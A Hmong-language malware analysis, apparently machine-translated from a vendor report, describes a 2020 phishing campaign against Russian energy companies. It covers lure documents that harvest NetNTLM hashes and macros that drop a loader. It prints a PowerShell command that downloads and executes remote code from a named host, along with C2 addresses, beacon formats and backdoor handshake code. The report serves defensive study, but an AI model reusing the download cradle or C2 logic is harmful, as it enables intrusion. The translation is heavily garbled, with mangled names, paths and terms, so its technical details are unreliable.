Peb qhov kev paub dhau los hauv kev tshawb xyuas kev ruaj ntseg hauv computer qhia tau hais tias email tseem yog ib qho ntawm cov kev siv feem ntau siv los ntawm cov neeg tawm tsam los pib nkag mus rau hauv kev tawm tsam network. Ib qho kev txiav txim siab tsis tu ncua nrog tsab ntawv tsis txaus ntseeg (lossis tsis xav tsis thoob) dhau los ua qhov nkag mus rau kev kis kab mob ntxiv, uas yog vim li cas cybercriminals tau nquag siv cov txheej txheem kev sib raug zoo, txawm hais tias muaj ntau yam kev vam meej.
Hauv cov ntawv tshaj tawm no peb xav tham txog peb qhov kev tshawb nrhiav tsis ntev los no rau hauv spam phiaj xwm phiaj xwm ntau lub lag luam hauv Lavxias roj thiab lub zog ua haujlwm. Txhua qhov kev tawm tsam ua raws tib qhov xwm txheej uas siv cov email cuav, thiab tsis muaj leej twg zoo li tau siv zog ntau rau hauv cov ntsiab lus ntawm cov emails no.
Kev txawj ntse
Nws tag nrho pib thaum kawg ntawm lub Plaub Hlis 2020, thaum tus kws kho mob Web tus kws tshuaj ntsuam xyuas tus kab mob tau tshawb pom qhov kev sib tw spam uas cov neeg nyiag nkas xa xov tooj tshiab rau cov neeg ua haujlwm ntawm ntau lub lag luam hauv Lavxias roj thiab lub zog. Tau kawg, qhov no tsis yog ib qho yooj yim qhia txog kev txhawj xeeb, txij li cov npe tsis muaj tiag, thiab cov ntaub ntawv .docx rub tawm ob daim duab los ntawm cov chaw taws teeb.
Ib ntawm lawv tau rub tawm mus rau tus neeg siv lub computer los ntawm xov xwm[.]zannews[.]com server. Nws yog ib qho tseem ceeb uas lub npe sau npe zoo ib yam li lub npe ntawm lub chaw tiv thaiv kev noj nyiaj txiag ntawm Kazakhstan - zannews[.]kz. Ntawm qhov tod tes, lub npe siv tam sim ntawd nco txog lwm qhov kev sib tw xyoo 2015 hu ua TOPNEWS, uas siv ICEFOG backdoor thiab muaj Trojan tswj domains nrog substring "xov xwm" hauv lawv cov npe. Lwm qhov nthuav tshwj xeeb yog tias thaum xa email rau cov neeg tau txais kev sib txawv, thov kom rub tawm cov duab siv cov ntawv thov sib txawv lossis cov npe duab tshwj xeeb.
Peb ntseeg tias qhov no tau ua tiav rau lub hom phiaj ntawm kev sau cov ntaub ntawv txhawm rau txheeb xyuas tus neeg sawv cev "txhim khu kev ntseeg", uas yuav raug lees paub los qhib tsab ntawv raws sijhawm. SMB raws tu qauv tau siv los rub tawm cov duab los ntawm lub server thib ob, uas tuaj yeem ua kom sau NetNTLM hashes los ntawm cov khoos phis tawj ntawm cov neeg ua haujlwm uas qhib cov ntaub ntawv tau txais.
Thiab ntawm no yog tsab ntawv nws tus kheej nrog cov ntaub ntawv cuav:
Thaum Lub Rau Hli Ntuj xyoo no, cov neeg nyiag nkas tau pib siv lub npe tshiab, cov kis las[.]manhajnews[.]com, txhawm rau rub tawm cov duab. Qhov kev tshuaj xyuas tau pom tias manhajnews[.]com subdomains tau siv hauv kev xa ntawv spam txij thaum lub Cuaj Hlis 2019. Ib lub hom phiaj ntawm qhov kev sib tw no yog ib lub tsev kawm ntawv loj hauv Lavxias.
Tsis tas li ntawd, los ntawm Lub Rau Hli, cov koom haum ntawm kev tawm tsam tuaj nrog cov ntawv tshiab rau lawv cov ntawv: lub sijhawm no cov ntaub ntawv muaj cov ntaub ntawv hais txog kev lag luam kev loj hlob. Cov ntaub ntawv ntawm tsab ntawv qhia meej tias nws tus kws sau ntawv tsis yog ib tus neeg hais lus Lavxias, lossis tau txhob txwm tsim kev xav txog nws tus kheej. Hmoov tsis zoo, cov tswv yim ntawm kev txhim kho kev lag luam, raws li ib txwm muaj, tau dhau los ua ib daim npog xwb - daim ntawv rov rub tawm ob daim duab, thaum lub server raug hloov mus rub tawm [.]inklingpaper[.]com.
Kev tsim kho tshiab tom ntej tau ua raws thaum Lub Xya Hli. Hauv kev sim hla kev tshawb pom cov ntaub ntawv tsis zoo los ntawm kev tiv thaiv kab mob, cov neeg tawm tsam tau pib siv Microsoft Word cov ntaub ntawv encrypted nrog tus password. Nyob rau tib lub sijhawm, cov neeg tawm tsam tau txiav txim siab siv cov txheej txheem kev sib raug zoo qub - kev ceeb toom nqi zog.
Cov ntawv nyeem ntawm qhov kev thov rov hais dua tau rov sau ua tib yam, uas ua rau muaj kev xav tsis thoob ntxiv ntawm tus neeg nyob hauv. Lub server rau rub tawm cov duab kuj tsis hloov.
Nco ntsoov tias nyob rau hauv txhua rooj plaub, e-mailboxes sau npe rau ntawm mail [.]ru thiab yandex[.]ru domains tau siv los xa ntawv.
Nres
Txog thaum lub Cuaj Hlis 2020, nws yog lub sijhawm ua haujlwm. Peb cov kws tshuaj ntsuam xyuas tus kab mob tau sau cov nthwv dej tshiab ntawm kev tawm tsam, uas cov neeg tawm tsam rov xa cov ntawv nyob rau hauv qhov kev hloov kho cov npe xov tooj. Txawm li cas los xij, lub sijhawm no cov ntawv txuas tau muaj cov macro phem.
Thaum qhib cov ntaub ntawv txuas, lub macro tsim ob cov ntaub ntawv:
- VBS tsab %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, uas tau npaj los tso tawm cov ntaub ntawv batch;
- Cov ntaub ntawv batch nws tus kheej %APPDATA%configstest.bat, uas yog obfuscated.
Lub ntsiab lus ntawm nws txoj hauj lwm los ntawm kev pib lub plhaub Powershell nrog qee qhov tsis muaj. Cov parameters dhau mus rau lub plhaub tau txiav txim siab rau hauv cov lus txib:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Raws li hauv qab no los ntawm cov lus txib tau nthuav tawm, lub npe los ntawm qhov kev them nyiaj rub tawm yog rov ua dua li qhov chaw xov xwm. Ib qho yooj yim , uas nws txoj hauj lwm ib leeg yog kom tau txais shellcode los ntawm cov lus txib thiab tswj server thiab ua nws. Peb tuaj yeem txheeb xyuas ob hom backdoors uas tuaj yeem ntsia tau rau ntawm tus neeg raug tsim txom lub PC.
BackDoor.Siggen2.3238
Thawj tus yog BackDoor.Siggen2.3238 - peb cov kws tshaj lij tsis tau ntsib ua ntej, thiab tseem tsis tau hais txog qhov program no los ntawm lwm tus neeg muag khoom antivirus.
Qhov kev pab cuam no yog rov qab sau rau hauv C ++ thiab khiav ntawm 32-ntsis Windows operating systems.
BackDoor.Siggen2.3238 muaj peev xwm sib txuas lus nrog kev tswj hwm server siv ob txoj cai: HTTP thiab HTTPS. Cov qauv sim siv HTTPS raws tu qauv. Tus neeg siv-tus neeg sawv cev hauv qab no yog siv rau hauv kev thov rau lub server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Hauv qhov no, txhua qhov kev thov tau muab nrog cov txheej txheem hauv qab no:
%s;type=%s;length=%s;realdata=%send
qhov twg txhua kab %s tau hloov pauv los ntawm:
- ID ntawm lub computer uas muaj kab mob,
- hom kev thov raug xa mus,
- ntev ntawm cov ntaub ntawv nyob rau hauv lub realdata teb,
- cov ntaub ntawv.
Nyob rau theem ntawm kev sau cov ntaub ntawv hais txog tus kab mob, lub backdoor tsim ib kab xws li:
lan=%s;cmpname=%s;username=%s;version=%s;
qhov twg lan yog tus IP chaw nyob ntawm lub computer muaj kab mob, cmpname yog lub computer lub npe, username yog tus neeg siv lub npe, version yog kab 0.0.4.03.
Cov ntaub ntawv no nrog tus cim sysinfo yog xa los ntawm POST thov mus rau tus tswj server nyob ntawm https[:]//31.214[.]157.14/log.txt. Yog teb BackDoor.Siggen2.3238 tau txais lub HUAB TAIS lub teeb liab, kev sib txuas yog suav tias yog kev ua tiav, thiab lub backdoor pib lub voj voog tseem ceeb ntawm kev sib txuas lus nrog cov neeg rau zaub mov.
Cov lus piav qhia ntau ntxiv ntawm cov qauv kev ua haujlwm BackDoor.Siggen2.3238 yog nyob rau hauv peb .
BackDoor.Whitebird.23
Qhov kev pabcuam thib ob yog kev hloov kho ntawm BackDoor.Whitebird backdoor, twb paub rau peb los ntawm qhov xwm txheej nrog tsoomfwv lub koomhaum hauv Kazakhstan. Cov ntawv no tau sau hauv C ++ thiab yog tsim los khiav ntawm 32-ntsis thiab 64-ntsis Windows operating systems.
Zoo li feem ntau cov kev pab cuam ntawm hom no, BackDoor.Whitebird.23 tsim los tsim kom muaj kev sib txuas encrypted nrog tus tswj server thiab tswj tsis tau kev tso cai ntawm lub khoos phis tawj muaj kab mob. Nruab rau hauv ib qho kev cuam tshuam uas siv lub dropper .
Cov qauv peb tau tshuaj xyuas yog lub tsev qiv ntawv siab phem nrog ob qho kev xa tawm:
- Google Ua Si
- Kev xeem.
Thaum pib ntawm nws txoj haujlwm, nws decrypts cov kev teeb tsa hardwired rau hauv lub cev rov qab siv lub algorithm raws li kev ua haujlwm XOR nrog byte 0x99. Lub configuration zoo li:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Txhawm rau kom ntseeg tau tias nws ua haujlwm tas li, lub nraub qaum hloov pauv tus nqi teev hauv daim teb ua haujlwm_hours kev teeb tsa. Daim teb muaj 1440 bytes, uas coj qhov tseem ceeb 0 lossis 1 thiab sawv cev rau txhua feeb ntawm txhua teev hauv ib hnub. Tsim ib lub xov tooj sib cais rau txhua lub network interface uas mloog lub interface thiab nrhiav kev tso cai pob ntawv ntawm lub npe neeg rau zaub mov los ntawm lub khoos phis tawj muaj kab mob. Thaum pom cov pob ntawv zoo li no, lub backdoor ntxiv cov ntaub ntawv hais txog lub npe neeg rau zaub mov rau nws cov npe. Tsis tas li ntawd, kuaj xyuas qhov muaj npe ntawm WinAPI InternetQueryOptionW.
Qhov kev zov me nyuam xyuas cov feeb thiab teev tam sim no thiab muab piv nrog cov ntaub ntawv hauv thaj teb ua haujlwm_hours kev teeb tsa. Yog tias tus nqi rau cov feeb sib txuas ntawm hnub tsis yog xoom, ces qhov kev sib txuas tau tsim nrog tus tswj server.
Tsim kev sib txuas rau lub server simulates tsim kev sib txuas siv TLS version 1.0 raws tu qauv ntawm tus neeg siv khoom thiab cov neeg rau zaub mov. Lub cev ntawm lub backdoor muaj ob buffers.
Thawj qhov tsis muaj pob ntawv TLS 1.0 Client Hello.
Qhov thib ob tsis muaj TLS 1.0 Client Key Exchange packets nrog qhov ntev ntawm 0x100 bytes, Hloov Cipher Spec, Encrypted Handshake Message.
Thaum xa ib pob ntawv Client Hello, lub backdoor sau 4 bytes ntawm lub sijhawm tam sim no thiab 28 bytes ntawm pseudo-random cov ntaub ntawv hauv Client Random teb, suav raws li hauv qab no:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Cov pob ntawv tau txais raug xa mus rau lub server tswj. Cov lus teb (Server Hello pob ntawv) xyuas:
- ua raws li TLS raws tu qauv version 1.0;
- Kev sau ntawv ntawm timestamp (thawj 4 bytes ntawm Random Data packet field) teev los ntawm tus neeg siv khoom rau lub sij hawm teev teev los ntawm tus neeg rau zaub mov;
- match ntawm thawj 4 bytes tom qab lub timestamp nyob rau hauv Random Data teb ntawm tus neeg siv khoom thiab server.
Nyob rau hauv cov ntaub ntawv ntawm qhov kev sib tw, lub backdoor npaj ib tug Client Key Exchange packet. Txhawm rau ua qhov no, nws hloov pauv Public Key hauv pob Client Key Txauv, nrog rau Encryption IV thiab Encryption Cov Ntaub Ntawv hauv pob Encrypted Handshake Message.
Lub backdoor tom qab ntawd tau txais cov pob ntawv los ntawm cov lus txib thiab tswj cov neeg rau zaub mov, xyuas tias TLS raws tu qauv version yog 1.0, thiab tom qab ntawd lees txais lwm 54 bytes (lub cev ntawm pob ntawv). Qhov no ua tiav qhov kev teeb tsa kev sib txuas.
Cov lus piav qhia ntau ntxiv ntawm cov qauv kev ua haujlwm BackDoor.Whitebird.23 yog nyob rau hauv peb .
Cov lus xaus thiab cov lus xaus
Kev tshuaj xyuas cov ntaub ntawv, malware, thiab cov txheej txheem siv tau tso cai rau peb hais nrog kev ntseeg siab tias qhov kev tawm tsam tau npaj los ntawm ib qho ntawm Suav APT pawg. Xav txog kev ua haujlwm ntawm backdoors uas tau nruab rau ntawm cov neeg raug tsim txom lub khoos phis tawj nyob rau hauv qhov xwm txheej ntawm kev ua tiav kev tawm tsam, kev kis tus kab mob, qhov tsawg kawg nkaus, mus rau tub sab ntawm cov ntaub ntawv tsis pub lwm tus paub los ntawm cov khoos phis tawj ntawm cov koom haum tawm tsam.
Tsis tas li ntawd, qhov xwm txheej yuav tshwm sim yog kev teeb tsa tshwj xeeb Trojans ntawm cov servers hauv zos nrog lub luag haujlwm tshwj xeeb. Cov no tuaj yeem yog cov tswj hwm sau npe, xa ntawv servers, Internet gateways, thiab lwm yam. Raws li peb tuaj yeem pom hauv qhov piv txwv , xws li servers tshwj xeeb yog txaus siab rau attackers rau ntau yam laj thawj.
Tau qhov twg los: www.hab.com